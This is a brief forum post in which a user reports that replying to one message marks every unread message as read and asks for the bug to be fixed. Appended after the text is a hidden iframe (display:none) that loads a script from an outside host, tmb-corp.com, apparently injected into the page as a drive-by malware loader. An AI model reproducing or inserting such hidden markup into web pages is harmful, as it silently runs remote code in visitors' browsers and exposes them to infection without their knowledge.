I just discovered that if you post a reply, that somehow updates the thing that keeps track of unread messages.

I have not looked at messages on this site for a good while. When I first came back, there were lots of messages to read. I read one and did a reply. Now it says that I have read all the messages.

Bummer.

Any possibility of fixing that bug?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>